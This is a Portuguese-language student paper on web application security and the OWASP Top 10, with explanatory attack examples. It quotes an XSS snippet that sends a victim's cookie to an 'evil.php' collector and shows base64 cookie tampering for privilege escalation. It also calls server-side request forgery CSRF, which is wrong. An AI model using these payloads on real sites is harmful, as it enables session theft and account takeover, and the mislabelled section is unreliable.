UniMetrocamp

Centro Universitário UniMetrocamp

Segurança Cibernética

Walison Vinicios Alves Ribeiro – 202203694588

Paulo Henrique Manoel Junior – 202202314099
Juan Felipe de Souza - 202102288673
Leonardo Augusto Palermo – 202208700543
Dalmo Rochelle de Jesus Freitas - 202102295858

Segurança de Aplicações e OWASP

Campinas

2023
 Sumário

Resumo .............................................................................................................. 4

O que é vulnerabilidade ..................................................................................... 4

Principais vulnerabilidades comuns da Open Web Application Security Project

(OWASP):........................................................................................................... 4

Quebra de controle de acesso .................................................................................................. 5

Falhas criptográficas.................................................................................................................. 5

Injeção ....................................................................................................................................... 5

Design inseguro ......................................................................................................................... 6

Configuração insegura............................................................................................................... 6

Componentes desatualizados e vulneráveis ............................................................................. 6

Falhas de identificação e autenticação ..................................................................................... 6

Falhas de software e de integridade de dados ......................................................................... 7

Falhas de registro e monitoramento de segurança .................................................................. 7

Falsificação de solicitação do lado do servidor ......................................................................... 7

Ataques de injeção ............................................................................................. 7

Injeção de SQL ........................................................................................................................... 7

Injeção de código ...................................................................................................................... 8

Injeção de Log ........................................................................................................................... 8

Quebra de autenticação ............................................................................................................ 9

Uso de credenciais roubadas: ............................................................................................... 9

Sequestro de sessão .............................................................................................................. 9

Ataque de força bruta ........................................................................................................... 9

Exposição de dados sensíveis .................................................................................................. 11

Abrange a proteção de dados sensíveis: ............................................................................. 11

 Quebra de controle de acessos ............................................................................................... 12

Exemplo de Cenários de Ataque ......................................................................................... 13

Identificação de configurações de segurança incorretas em ambientes web. .. 13

Cross-Site Scripting .......................................................................................... 13

Desserialização insegura ................................................................................. 14

Exemplo de um ataque usando desserialização insegura:...................................................... 14

Monitorização dos Sistemas Web: Como e Por Que Gravar Registros ........... 15

Como gravar registros ............................................................................................................. 15

1. Configuração de logs de segurança............................................................................. 15

2. Uso de ferramentas de monitoramento ..................................................................... 15

3. Análise de logs ............................................................................................................. 15

4. Implementação de políticas de segurança.................................................................. 15

SAST e DAST .................................................................................................. 16

O que são................................................................................................................................. 16

SAST – Static Application Security Testing .............................................................................. 16

DAST – Dynamic Application Security Testing......................................................................... 16

Referências bibliográficas: ............................................................................... 18

Resumo

A segurança de aplicações web é uma preocupação constante para

desenvolvedores e usuários, especialmente quando se trata de vulnerabilidades
comuns como as listadas pelo Open Web Application Security Project (OWASP). Entre
essas vulnerabilidades, destacam-se a injeção de código malicioso, quebra de
autenticação e controle de acesso, exposição de dados sensíveis, e configurações de
segurança incorretas. Para garantir a proteção das aplicações web, é fundamental
identificar essas vulnerabilidades e adotar medidas preventivas.
Além das vulnerabilidades mencionadas, outras duas ameaças comuns ao
ambiente web são o cross-site scripting (XSS) e a desserialização insegura. Ambas
podem ser exploradas por invasores para executar ações maliciosas em aplicações
web. Para evitar esses ataques, é importante conhecer como eles funcionam e como
identificá-los.
Para garantir a segurança das aplicações web, é fundamental realizar a
gravação de registros e a monitorização dos sistemas. Dessa forma, é possível
identificar possíveis ameaças e agir rapidamente para solucioná-las. Entre as
ferramentas disponíveis para garantir a segurança das aplicações web, destacam-se o
SAST e DAST, que permitem identificar vulnerabilidades em códigos e infraestruturas.
Em resumo, a segurança de aplicações web é um tema de extrema importância
para desenvolvedores e usuários, e exige atenção constante. Conhecer as
vulnerabilidades comuns, identificar configurações de segurança incorretas, entender
como funcionam os ataques e utilizar ferramentas de monitorização são algumas das
medidas fundamentais para garantir a proteção das aplicações web.

O que é vulnerabilidade

Conforme significados.com.br [1] Vulnerabilidade é a característica de quem ou

do que é vulnerável, ou seja, frágil, delicado e fraco. A vulnerabilidade é uma
particularidade que indica um estado de fraqueza, que pode se referir tanto ao
comportamento das pessoas, como objetos, situações, ideias e etc.
Embora essa definição de vulnerabilidade seja correta, no contexto da
cibersegurança, a vulnerabilidade se refere especificamente a uma falha ou fraqueza
em um sistema, aplicação ou dispositivo que pode ser explorada por um invasor para
obter acesso, manipular informações ou executar ações maliciosas. Portanto, na
cibersegurança, a vulnerabilidade é uma condição que pode ser explorada por um
invasor para comprometer a segurança de um sistema ou aplicação. A identificação e
correção de vulnerabilidades é uma das principais atividades na proteção de sistemas
e dados contra ataques cibernéticos.

Principais vulnerabilidades comuns da Open Web Application Security

Project (OWASP):
 O OWASP (Open Web Application Security Project) é uma comunidade global
sem fins lucrativos que busca reduzir as vulnerabilidades de segurança na web. Para
isso, desenvolvem conteúdos educativos gratuitos focados principalmente na proteção
de dados. O OWASP Top 10 é um ranking que lista as 10 falhas mais comuns,
perigosas ou críticas ligadas ao desenvolvimento de projetos web. Essa lista se tornou
um parâmetro reconhecido mundialmente por sua qualidade e utilidade para empresas
e desenvolvedores que buscam proteger suas aplicações web contra potenciais
ciberataques. O ranking traz benefícios como proteção de APIs, aumento das
possibilidades de sucesso das aplicações, desenvolvimento de uma criptografia mais
forte, redução de falhas operacionais nos sistemas e melhoria na reputação da
empresa. A lista é atualizada periodicamente e a publicação mais recente é referente
ao ano de 2021.

Quebra de controle de acesso

A quebra de controle de acesso é a vulnerabilidade mais grave em aplicações

web atualmente, de acordo com o ranking OWASP Top 10 de 2021. Isso significa que
há riscos de acesso não autorizado devido a recursos utilizados por cibercriminosos
para burlar o controle de acesso. Em uma pesquisa, foram identificadas mais de 318
mil ocorrências de enumerações de fraquezas comuns em aplicativos, o que
representa 3,81% dos aplicativos testados.

Falhas criptográficas

Essa categoria se concentra em problemas ligados à criptografia, que é

considerada fundamental para a segurança de dados. A eficiência da criptografia
precisa ser garantida para evitar a exposição de informações confidenciais e o
comprometimento do sistema como um todo.

Injeção

A categoria de Injeção é uma técnica de ataque que se baseia na manipulação

de códigos, como ocorre com o SQL, e pode prejudicar o banco de dados de diversas
formas. Na pesquisa realizada para elaborar a lista, a taxa máxima de incidência
desse tipo de problema nos aplicativos testados foi de 19% e a taxa média de 3,37%.
Foram identificadas 33 enumerações de fraquezas comuns, com o segundo maior
número de ocorrências em aplicativos (274 mil ocorrências). O cross-site scripting ou
script entre sites foi incluído nesta categoria na edição mais recente do OWASP Top
10.
 Design inseguro

Destaca a importância de se levar em consideração a segurança desde as

etapas iniciais do desenvolvimento de uma aplicação. A falta de padrões e princípios
de design seguros pode levar a vulnerabilidades que não podem ser corrigidas apenas
com implementações perfeitas, já que os controles de segurança não foram criados.
Essa categoria enfatiza a necessidade de se investir em arquiteturas de referência e
modelagem de ameaças para garantir a segurança da aplicação em todas as etapas
do desenvolvimento.

Configuração insegura

A categoria de risco de Configuração Insegura subiu no ranking OWASP Top

10, indo da sexta para a quinta posição. Essa categoria apresentou mais de 208 mil
ocorrências de fraquezas comuns em aplicativos testados, com uma taxa média de
incidência de 4,5%. A subida no ranking se deve ao aumento de mudanças em
softwares altamente configuráveis nos últimos anos. É necessário rever a
maleabilidade das configurações para evitar incidentes de segurança. Além disso, a
antiga categoria de Entidades Externas agora foi incluída nesta categoria de
Configuração Insegura.

Componentes desatualizados e vulneráveis

Essa categoria chama a atenção para a falta de cuidado com as atualizações

periódicas de segurança dos componentes usados em aplicações. Mesmo
componentes que não representam riscos atualmente podem se tornar vulneráveis no
futuro, exigindo uma consideração cuidadosa da evolução tecnológica no momento do
desenvolvimento. Nenhuma enumeração de fraquezas comuns foi encontrada nesta
categoria.

Falhas de identificação e autenticação

A categoria "Falhas de Identificação e Autenticação" é extremamente

importante no OWASP Top 10, pois se refere a problemas relacionados à autenticação
de usuários em sistemas e aplicativos. Essas falhas incluem erros como senhas
fracas, falta de validação de credenciais, autenticação sem criptografia, entre outros.
 Falhas de software e de integridade de dados

Essa categoria engloba suposições em relação a atualizações de software,

dados críticos e pipelines de CI/CD sem verificação da integridade. Foram
identificadas 10 enumerações de fraquezas comuns, com impactos ponderados. A
categoria também inclui a antiga “Desserialização insegura”.

Falhas de registro e monitoramento de segurança

Essa categoria engloba as falhas relacionadas ao registro e ao monitoramento

de segurança que podem afetar diretamente a visibilidade, a perícia e os alertas
quanto aos incidentes de cibersegurança.
Essas falhas podem ocorrer quando as empresas não registram e monitoram
adequadamente as atividades de seus sistemas, o que torna mais difícil a identificação
de possíveis ameaças ou violações de segurança. Isso pode levar a uma resposta
mais lenta ou até mesmo a falhas em detectar ataques e invasões.

Falsificação de solicitação do lado do servidor

A falsificação de solicitação do lado do servidor, também conhecida como

CSRF (Cross-Site Request Forgery), é uma técnica utilizada por invasores para
enganar usuários autenticados e realizar ações maliciosas em nome deles.
Essa vulnerabilidade ocorre quando um site ou aplicação não valida
adequadamente as solicitações vindas do usuário, permitindo que um invasor crie um
link ou formulário que faça com que o usuário execute uma ação sem saber.

Ataques de injeção

Injeção de SQL

A injeção de SQL é um ataque que explora vulnerabilidades em aplicações web

que não validam corretamente os dados de entrada fornecidos pelos usuários. Os
atacantes podem injetar comandos SQL maliciosos nas consultas enviadas ao banco
de dados, permitindo acesso não autorizado a informações confidenciais, modificação
ou exclusão de dados e até mesmo execução de comandos arbitrários no servidor.
Existem diferentes tipos de ataques de injeção de SQL, como injeção SQL baseada
em erro, injeção SQL baseada em união e injeção SQL fora de banda.
 Fonte (Script Case)

Injeção de código

Conforme periciacomputacional.com [4] A injeção de código se refere a

qualquer meio que permita que um invasor injete o código-fonte em um aplicativo da
Web, de modo que ele seja interpretado e executado. Isso não se aplica ao código
injetado em um cliente do aplicativo, por exemplo, Javascript, que, em vez disso, se
enquadra no domínio do Cross-Site Scripting (XSS).
A Injeção de Código pode ocorrer quando o código-fonte é injetado de uma
entrada não confiável ou quando o aplicativo da Web é manipulado para carregá-lo de
uma fonte externa. Quando isso acontece como resultado da inclusão de um recurso
externo, é chamado de Inclusão Remota de Arquivo. As principais causas são falhas
de validação de entrada, inclusão de entrada não confiável em qualquer contexto que
possa ser avaliada como código PHP, falhas na proteção de repositórios de código-
fonte, falhas no uso de bibliotecas de terceiros e erros de configuração do servidor. É
importante prestar atenção especial às entradas de usuário não confiáveis, pois todas
elas podem representar um risco significativo.

Injeção de Log

Os logs de aplicativos podem ser alvos de invasores que desejam disfarçar

outros ataques ou enganar revisores de registros. A vulnerabilidade dos logs depende
dos controles estabelecidos durante a gravação de logs e da garantia de que os dados
de log são tratados como uma fonte de dados não confiável. Um invasor pode injetar
entradas de log não confiáveis, como uma tentativa de login bem-sucedida para
disfarçar uma tentativa de login com falha. Eles também podem injetar vetores XSS ou
caracteres para manipular a exibição das entradas de log em um console.
Conforme periciacomputacional.com [4] Um sistema de log simples pode gravar linhas
de texto em um arquivo usando file_put_contents (). Por exemplo, um programador
pode registrar tentativas de login com falha usando uma string do seguinte formato:
E se o atacante usasse um nome de usuário no formulário “AdminnSuccessful login by
Adminn”?
Se essa string, de entrada não confiável, fosse inserida no log, o invasor teria
disfarçado com sucesso a tentativa de login com falha como uma falha inocente do
usuário Admin para efetuar login. Adicionar uma tentativa de repetição bem-sucedida
torna os dados ainda menos suspeitos.
Naturalmente, o ponto aqui é que um invasor pode anexar todos os tipos de entradas
de log. Eles também podem injetar vetores XSS e até injetar caracteres para mexer
com a exibição das entradas de log em um console.

Quebra de autenticação

Um ataque de quebra de autenticação ocorre quando um invasor explora falhas

nos sistemas de autenticação e gerenciamento de sessão de uma aplicação para
obter acesso não autorizado a recursos protegidos ou assumir a identidade de outro
usuário. Existem diversas formas pelas quais esse tipo de ataque pode acontecer, e as
consequências podem variar desde um único usuário perdendo acesso a sua conta
até a comprometimento completo do sistema
Alguns exemplos de ataques de quebra de autenticação incluem:

Uso de credenciais roubadas: Invadindo contas de usuários com credenciais

obtidas através de vazamentos de dados, phishing ou outras técnicas.

Sequestro de sessão: Explorando falhas na implementação do gerenciamento

de sessão, como sessões que não expiram corretamente ou identificadores de sessão
expostos em URLs.

Ataque de força bruta: Tentando adivinhar senhas ou respostas de perguntas

de segurança usando técnicas de força bruta.

Para prevenir ataques de quebra de autenticação, algumas recomendações incluem:

Implementar períodos de expiração de sessão e logout automático para

sessões inativas, utilizar autenticação de dois fatores para aumentar a segurança das
contas de usuário, aplicar limitação de taxa (rate-limiting) para prevenir tentativas
excessivas de login, não expor identificadores de sessão ou credenciais em URLs e
logs e gerar uma nova sessão após uma autenticação bem-sucedida ou mudança no
nível de privilégio.
Exemplo de ataque de força bruta

Considerando um cenário em que uma aplicação web apresenta

vulnerabilidades de segurança, como a falta de limitação de requisições por segundo e
uma má configuração de CORS, podemos utilizar um script para realizar um ataque de
força bruta.

(Elaboração própria)
Esse script em PHP é um exemplo de um ataque de força bruta a um
formulário de login em um site. Para cada senha no arquivo file.txt, o script envia uma
requisição com o par de usuário e senha, e verifica a resposta do servidor procurando
por uma string específica ("Bem-vindo"), que indica que o login foi bem sucedido. Se a
senha correta for encontrada, o script imprime a senha na tela e interrompe o loop;
caso contrário, ele continua tentando com as outras senhas até que todas tenham sido
testadas.
Exposição de dados sensíveis

Exposição de dados sensíveis é um tópico de segurança da informação que se

refere à divulgação não autorizada ou acidental de informações que podem ser usadas
para identificar ou prejudicar indivíduos ou organizações. Isso pode incluir informações
pessoais, como nome completo, endereço, número de telefone, endereço de e-mail,
CPF, RG, número de cartão de crédito, informações bancárias, informações de login e
senha, entre outros dados que possam ser usados para obter acesso não autorizado a
sistemas ou contas pessoais. A exposição de dados sensíveis pode ocorrer por meio
de várias vulnerabilidades, incluindo erros de programação, configurações incorretas,
ataques de hackers e engenharia social. As consequências da exposição de dados
sensíveis podem incluir roubo de identidade, fraude financeira, violações de
privacidade e perda de reputação. É importante que indivíduos e organizações adotem
medidas de segurança para proteger seus dados sensíveis, incluindo criptografia,
autenticação de dois fatores e monitoramento de atividades suspeitas.

Abrange a proteção de dados sensíveis:

• No momento que o dado é inserido pelo usuário da aplicação.

• No transporte desse dado até o servidor.
• No armazenamento.
• No retorno do dado até o usuário.

Um exemplo de um ataque de dados sensíveis é o man-in-the-middle É um ataque

em que a comunicação entre dois hosts é interceptada por um terceiro, que faz a
captura de pacotes “fingindo” ser outro endereço na rede.
 Fonte (http://www.luizguarino.com.br)

Quebra de controle de acessos

O controle de acesso é uma medida que limita as ações dos usuários para que
eles não excedam as suas permissões. Quando ocorrem falhas nesse controle, pode
haver vazamento, alteração ou destruição de informações não autorizadas, ou o
desempenho de funções comerciais fora dos limites do usuário.

Segundo https://owasp.org/ [7] Vulnerabilidades comuns de controle de acesso

incluem:

• Violação do princípio de privilégio mínimo ou negação por padrão, onde o

acesso deve ser concedido apenas para determinados recursos, funções
ou usuários, mas está disponível para qualquer pessoa.
• Ignorar verificações de controle de acesso modificando a URL
(adulteração de parâmetros ou navegação forçada), o estado interno do
aplicativo, a página HTML ou usando uma ferramenta de ataque que
modifica as requisições de API.
• Permitir a visualização ou edição da conta de outrem, mediante a
disponibilização do seu identificador único (referências diretas não seguras
a objetos).
 • Acessando API sem controles de acesso para POST, PUT e DELETE.
• Elevação de privilégio. Agir como um usuário sem estar logado ou agir
como um administrador quando logado como um usuário.
• Manipulação de metadados, como reproduzir ou adulterar um token de
controle de acesso JSON Web Token (JWT), um cookie ou campo oculto
manipulado para elevar privilégios ou abusar da invalidação de JWT.
• A configuração incorreta do CORS permite o acesso à API de origens não
autorizadas / não confiáveis.
• Força a navegação para páginas autenticadas como um usuário não
autenticado ou para páginas privilegiadas como um usuário padrão.

Exemplo de Cenários de Ataque

Um invasor simplesmente modifica o parâmetro 'acct' do navegador para enviar

o número de conta que desejar. Se não for verificado corretamente, o invasor pode
acessar a conta de qualquer usuário.
https://example.com/app/accountInfo?acct=notmyacct

Identificação de configurações de segurança incorretas em ambientes

web.
Há várias maneiras de identificar configurações de segurança incorretas em
uma aplicação web, incluindo:
• Verificação manual: Você pode examinar manualmente as configurações de
segurança da aplicação e compará-las com as melhores práticas
recomendadas. Por exemplo, você pode verificar se a aplicação usa SSL/TLS
para criptografar o tráfego da web e se as senhas dos usuários são
armazenadas de maneira segura. Também pode verificar se a aplicação possui
políticas de senha fortes e se há limites no número de tentativas de login.
• Verificação automatizada: Existem várias ferramentas automatizadas
disponíveis, como o OWASP ZAP, o Burp Suite, o Nikto e o Nmap, que podem
ajudá-lo a identificar configurações de segurança incorretas em uma aplicação
web. Essas ferramentas executam testes de penetração na aplicação para
descobrir vulnerabilidades comuns, como falhas de XSS, SQL Injection, etc.

Cross-Site Scripting
Segundo owasp.org [9] os ataques Cross-Site Scripting (XSS) são um tipo de
injeção, na qual scripts maliciosos são injetados em sites benignos e confiáveis. Os
ataques XSS ocorrem quando um invasor usa um aplicativo da Web para enviar um
código malicioso, geralmente na forma de um script do lado do navegador, para um
usuário final diferente. As falhas que permitem que esses ataques sejam bem-
sucedidos são bastante difundidas e ocorrem em qualquer lugar em que um aplicativo
da Web use a entrada de um usuário na saída que ele gera sem validá-lo ou codificá-
lo.
 Um invasor pode usar XSS para enviar um script malicioso a um usuário
desavisado. O navegador do usuário final não tem como saber que o script não é
confiável e executará o script. Como acredita que o script veio de uma fonte confiável,
o script malicioso pode acessar quaisquer cookies, tokens de sessão ou outras
informações confidenciais retidas pelo navegador e usadas com esse site. Esses
scripts podem até reescrever o conteúdo da página HTML.
Se o aplicativo não validar os dados de entrada, o invasor pode facilmente
roubar um cookie de um usuário autenticado. Tudo o que o invasor precisa fazer é
colocar o seguinte código em qualquer entrada postada (por exemplo: quadros de
mensagens, mensagens privadas, perfis de usuário):
<SCRIPT type="text/javascript">
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
</SCRIPT>
O código acima passará um conteúdo escapado do cookie (de acordo com o
RFC, o conteúdo deve ser escapado antes de enviá-lo via protocolo HTTP com o
método GET) para o script evil.php na variável “cakemonster”. O invasor então verifica
os resultados de seu script evil.php (um script de captura de cookies geralmente grava
o cookie em um arquivo) e o usa.

Desserialização insegura
A desserialização é um processo que envolve a recuperação de dados de um
objeto a partir de um conjunto de bytes. Se essa operação não for feita com
segurança, um invasor pode explorar essa vulnerabilidade para executar códigos
maliciosos dentro de um aplicativo. Isso pode permitir ao invasor ter acesso não
autorizado ao servidor e até mesmo elevar seus privilégios para realizar ações
maliciosas. Como resultado, toda a rede pode ser comprometida e sujeita a ataques
ainda mais graves.

Exemplo de um ataque usando desserialização insegura:

De acordo com o post " Insecure Deserialization - Entenda sobre!" do autor

Rodolfo Marino [11] Uma página em PHP emprega esse processo de serialização e
desserialização em cookies não criptografados e em base64 após a autenticação do
usuário para controle de autorização dos usuários, da seguinte forma:
Tzo0OiJBdXRoIjozOntzOjU6InVzZXIiO3M6NToiamFtZXMiO3M6MzoibG9naW4iO3
M6ODoiaXNsb2dnZWQiO3M6MjoiaWQiO2I6MTt9

Ao decodar o base64 no site: https://www.base64decode.org/, é possível ver o

objeto serializado:
O:4:”Auth”:3:{s:5:”user”;s:5:”james”;s:3:”login”;s:8:”islogged”;s:2:”id”;b:1;}
O = representa um objeto
s = representa uma string
b = representa um valor booleano
Se trocarmos o valor do id de 1 para 0, e encodamos novamente em base64 no
seguinte site: https://www.base64encode.org/ e utilizarmos como cookie, ira ser
possível realizar um Broken Access Control, escalando o privilégio do usuário para o
de admin que é representado pelo id 0.

Monitorização dos Sistemas Web: Como e Por Que Gravar Registros

Os registros, ou logs, são arquivos que registram todas as atividades que
acontecem em um sistema, incluindo ações de usuários, tentativas de acesso não
autorizadas, erros e falhas de sistema. Ao gravar esses registros, é possível identificar
comportamentos anômalos e identificar possíveis ameaças à segurança do sistema.
Além disso, os logs podem ser utilizados para fins de auditoria e para identificar pontos
de falha na aplicação.
A monitorização, por sua vez, envolve a coleta e análise em tempo real de
dados sobre o sistema, incluindo desempenho, tráfego de rede e uso de recursos. Isso
permite detectar possíveis problemas, como quedas de desempenho ou
indisponibilidade da aplicação, e tomar medidas preventivas antes que ocorram
incidentes graves.

Como gravar registros

1. Configuração de logs de segurança: é importante definir quais eventos serão

registrados em logs de segurança, como tentativas de login, acesso a arquivos
sensíveis, atividades de administração, entre outros. Esses logs devem ser
armazenados em um local seguro e com acesso restrito, para garantir a
integridade das informações.

2. Uso de ferramentas de monitoramento: existem diversas ferramentas de

monitoramento disponíveis no mercado, que podem ser utilizadas para
identificar atividades suspeitas nos sistemas web. Essas ferramentas podem
enviar alertas para os administradores em tempo real, permitindo que ações de
mitigação sejam tomadas rapidamente.

3. Análise de logs: os logs de segurança devem ser analisados periodicamente

para identificar possíveis ameaças e vulnerabilidades. A análise pode ser feita
manualmente ou com o auxílio de ferramentas específicas, que facilitam a
identificação de padrões de comportamento suspeitos.

4. Implementação de políticas de segurança: é importante definir e

implementar políticas de segurança claras e efetivas para garantir a proteção
dos sistemas web. Essas políticas devem incluir medidas de prevenção,
detecção e resposta a incidentes de segurança.
Em resumo, gravar e registrar o monitoramento de sistemas web envolve a
configuração de logs de segurança, o uso de ferramentas de monitoramento, a análise
de logs e a implementação de políticas de segurança efetivas.
SAST e DAST

O que são

SAST (Static Application Security Testing) e DAST (Dynamic Application

Security Testing) são duas abordagens de testes de segurança de aplicativos.

SAST – Static Application Security Testing

O SAST é uma ferramenta que faz uma revisão completa do código para
identificar e auxiliar na correção de vulnerabilidades a nível de código. Ele realiza um
scan no código-fonte das aplicações usando algoritmos de análise estática, de fácil
implantação no pipeline CI e baixo custo de correções. Sua proposta é identificar
issues com antecedência e executar a correção imediata, durante a fase de
implementação, para identificar vulnerabilidades enquanto ainda são simples de serem
corrigidas.

Exemplo do SAST Horusec em execução. Fonte (zup.com.br)

DAST – Dynamic Application Security Testing

O DAST faz uma análise do código em execução, atuando de forma mais

dinâmica por meio de testes automatizados. Essas ferramentas são semelhantes aos
testes de penetração (Pentest) e visam simular uma invasão em um sistema ou
aplicação.
Exemplo de um DAST em execução pela ferramenta OWASP ZAP. Fonte (zup.com.br)
Referências bibliográficas:

1 - Significado de Vulnerabilidade.
https://www.significados.com.br/vulnerabilidade/

2 - OWASP Top Ten.

https://owasp.org/www-project-top-ten/, 2022

3 - OWASP top 10: lista atualizada das 10 vulnerabilidades mais comuns em

aplicações.
https://blog.ecoit.com.br/owasp-top-10/, 2022

4 - ATAQUES DE INJEÇÃO – INJECTION ATTACKS.

https://periciacomputacional.com/ataques-de-injecao-injection-attacks/, 2018

5 - Exposição de Dados Sensíveis.

http://www.luizguarino.com.br/site/seguranca_informacao/02%20-%20A6%20-
%20Exposicao%20de%20Dados%20Sensiveis.pdf

6 - What is Sensitive Data Exposure Vulnerability & How to Avoid It?

https://securiti.ai/blog/sensitive-data-exposure/, 2022

7 - A01:2021 – Quebra de Controle de Acesso.

https://owasp.org/Top10/pt_BR/A01_2021-Broken_Access_Control/

8 - Security Misconfiguration: Impact, Examples, and Prevention.

https://brightsec.com/blog/security-misconfiguration/, 2022

9 - Cross Site Scripting (XSS).

https://owasp.org/www-community/attacks/xss/

10 - PROTEJA-SE: RELATÓRIO INDICA OS MAIORES RISCOS DE SEGURANÇA

NA WEB.
https://blog.onedaytesting.com.br/relatorio-owasp-riscos-seguranca

11 - Insecure Deserialization - Entenda sobre!

https://rodolfomarianocy.medium.com/insecure-deserialization-entenda-e-explore-
f9c31bba85a2, 2021

12 - Different Types of Security Logs for Cybersecurity.

https://www.analyticssteps.com/blogs/different-types-security-logs-cybersecurity, 2022

13 - WHAT IS SECURITY LOGGING AND MONITORING?

https://www.bitlyft.com/resources/what-is-security-logging-and-monitoring, 2019

14 - Ferramentas SSDLC: SAST, DAST e SCA.

https://www.zup.com.br/blog/ferramentas-ssdlc, 2022